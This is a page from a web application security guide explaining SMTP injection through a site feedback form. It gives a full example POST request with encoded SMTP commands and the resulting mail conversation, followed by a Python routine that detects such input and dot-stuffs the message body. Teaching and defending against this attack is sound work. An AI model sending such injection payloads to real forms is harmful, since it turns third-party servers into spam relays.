Web application security - the fast guide 1.1 | Page 147

Chapter 7 - Attack execution (3)

The main difference from the previous header manipulation approach is that the attacker can pass SMTP commands, which gives them the opportunity to issue another MAIL FROM command and take full control over an entirely new message. As an example, suppose the attacker injects the following input, taking advantage of the application's improper input validation:

POST feedback.php HTTP/1.1
Host: vulnerableApp.com
Content-Length: 266

[email protected]&Subject=Site+feedback%0d%0aany message%0d%0a%2e%0d%0aMAIL+FROM:+mail@attacker-viagra.com%0d%0aRCPT+TO:[email protected]%0d%0aDATA%0d%0aFrom:+[email protected]%0d%0aTo:+[email protected]%0d%0aSubject:+Cheap+V1AGR4%0d%0aBlah%0d%0a%2e%0d%0a&Message=spam message contents

The resulting SMTP conversation will be:

MAIL FROM: [email protected]
RCPT TO: feedback@vulnerableApp.com
DATA
From: [email protected]
To: [email protected]
Subject: Site+feedback
any message
.
MAIL FROM: [email protected]
RCPT TO: [email protected]
DATA
From: [email protected]
To: [email protected]
Subject: Cheap V1AGR4
Blah
.
spam message contents
.

It is clear that two messages are sent: the first is the legitimate feedback message and the second is entirely controlled by the attacker.
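As an added defensive example (not code from the guide), the following shows how a feedback handler can detect and neutralise this kind of input before anything reaches the mail server: single-line fields that end up in the SMTP envelope or message headers (From, Subject, following the request above) are rejected if they contain CR/LF or lines that would read as SMTP commands or the end-of-data marker, and the multi-line Message body is dot-stuffed so a lone "." line cannot terminate the DATA section early. The sample request bodies and the addresses in them are constructed placeholders.

```python
import re
from urllib.parse import parse_qs

# Form fields that the (hypothetical) feedback handler copies into SMTP
# envelope commands or message headers. Each must stay on one line: a CR or
# LF lets the submitter end the current SMTP line and start a new one.
SINGLE_LINE_FIELDS = ("From", "Subject")

LINE_BREAK_RE = re.compile(r"[\r\n]")

# Lines that the mail server would interpret as a new envelope command, the
# start of message data, or the end-of-data marker if they arrived on their
# own line inside a field that should have been a single header value.
SMTP_CONTROL_RE = re.compile(
    r"^(?:MAIL\s+FROM:|RCPT\s+TO:|DATA\s*$|\.\s*$)",
    re.IGNORECASE | re.MULTILINE,
)


def parse_form(raw_body: str) -> dict:
    """URL-decode an application/x-www-form-urlencoded body into field -> value.

    parse_qs turns '+' into a space and %0d%0a into a real CR LF pair, which is
    exactly the form in which the handler would otherwise hand the value to
    the SMTP library.
    """
    parsed = parse_qs(raw_body, keep_blank_values=True)
    return {name: values[0] for name, values in parsed.items()}


def find_injection(form: dict) -> list:
    """Return a list of findings; an empty list means the fields are safe to
    place on single SMTP lines."""
    findings = []
    for field in SINGLE_LINE_FIELDS:
        value = form.get(field, "")
        if LINE_BREAK_RE.search(value):
            findings.append(f"{field}: contains CR/LF")
        if SMTP_CONTROL_RE.search(value):
            findings.append(f"{field}: contains SMTP command or end-of-data marker")
    return findings


def dot_stuff(body: str) -> str:
    """Prepare a multi-line body for the DATA section (RFC 5321 section 4.5.2):
    normalise line endings to CRLF and prefix every line that starts with '.'
    with a second '.', so a line holding only '.' is delivered as content
    instead of ending the message."""
    lines = body.replace("\r\n", "\n").replace("\r", "\n").split("\n")
    return "\r\n".join("." + line if line.startswith(".") else line for line in lines)


# Constructed sample request bodies (placeholder addresses, not from the guide).
INJECTED_BODY = (
    "From=user%40example.com&Subject=Site+feedback%0d%0aany+message%0d%0a%2e%0d%0a"
    "MAIL+FROM:+mail%40spam.example%0d%0aRCPT+TO:+victim%40example.net%0d%0aDATA%0d%0a"
    "Subject:+Unwanted+mail%0d%0aBlah%0d%0a%2e%0d%0a&Message=spam+message+contents"
)
BENIGN_BODY = "From=user%40example.com&Subject=Site+feedback&Message=Nice+site%0d%0a.+thanks"


if __name__ == "__main__":
    for label, raw in (("injected", INJECTED_BODY), ("benign", BENIGN_BODY)):
        form = parse_form(raw)
        findings = find_injection(form)
        if findings:
            print(label, "-> rejected:", findings)
        else:
            print(label, "-> accepted; body to send:", repr(dot_stuff(form["Message"])))
```

The check deliberately rejects rather than strips CR/LF from header fields: silently removing the characters would let "Subject=MAIL FROM:..." survive as a harmless header value, but it also hides the attempt from the logs, whereas a rejection with a finding gives the security operations team a clear signal to alert on.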